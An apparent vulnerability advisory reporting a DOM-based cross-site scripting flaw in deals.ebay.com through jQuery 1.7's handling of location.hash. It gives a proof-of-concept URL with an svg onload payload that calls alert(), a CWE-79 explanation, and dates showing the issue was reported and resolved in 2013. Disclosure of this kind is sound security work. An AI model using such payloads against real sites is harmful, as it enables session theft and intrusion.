DOM XSS PoC with jQuery V1.7 via $(location.hash) in deals.ebay.com

PoC URL http://deals.ebay.com/#<svg onload="alert('jQuery V1.7')"> | XSS.CX | Reported May 25, 2013 | Resolved June 2013
Target URL High Medium Low Info
http://deals.ebay.com 1000

Alert Detail Click here to hide all alerts
Hide the alert
High (Verified)DOM XSS
Description
jQuery V1.7
URL http://deals.ebay.com
Parameter location.hash via <svg onload="alert('Vulnerable jQuery V1.7')">
Other information CWE-79:Type0: In DOM-based XSS, the client performs the injection of XSS into the page; in the other types, the server performs the injection. DOM-based XSS generally involves server-controlled, trusted script that is sent to the client, such as Javascript that performs sanity checks on a form before the user submits it. If the server-supplied script processes user-supplied data and then injects it back into the web page (such as with dynamic HTML), then DOM-based XSS is possible.

PoC in IE10

IE10 PoC, DOM XSS, jQuery V1.7, Javascript Injection, deals.ebay.com, XSS.CX